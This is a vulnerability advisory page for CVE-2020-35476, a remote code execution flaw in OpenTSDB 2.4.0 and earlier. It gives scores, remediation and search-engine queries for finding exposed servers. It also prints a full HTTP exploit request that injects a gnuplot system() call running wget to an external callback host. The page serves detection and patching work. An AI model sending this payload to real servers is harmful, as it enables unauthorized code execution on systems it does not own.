🔙 목록으로 돌아가기

CVE-2020-35476: OpenTSDB <=2.4.0 - Remote Code Execution

TitleOpenTSDB <=2.4.0 - Remote Code Execution
Authorpikpikcu
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUpgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.9425
CVE IDCVE-2020-35476
CWE IDCWE-78
Shodan Queryhtml:"OpenTSDB"http.html:"opentsdb"
Fofa Querybody="opentsdb"
Tags cve cve2020 opentsdb rce packetstorm vkev vuln

🔍 Vulnerability Description

OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://d5jotlhle0o10b2eb8hgmmg3ebzt6eckm.oast.live%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2) AppleWebKit/619.14.1 (KHTML, like Gecko) Version/17.7.52 Safari/619.14.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35476.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-35476.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A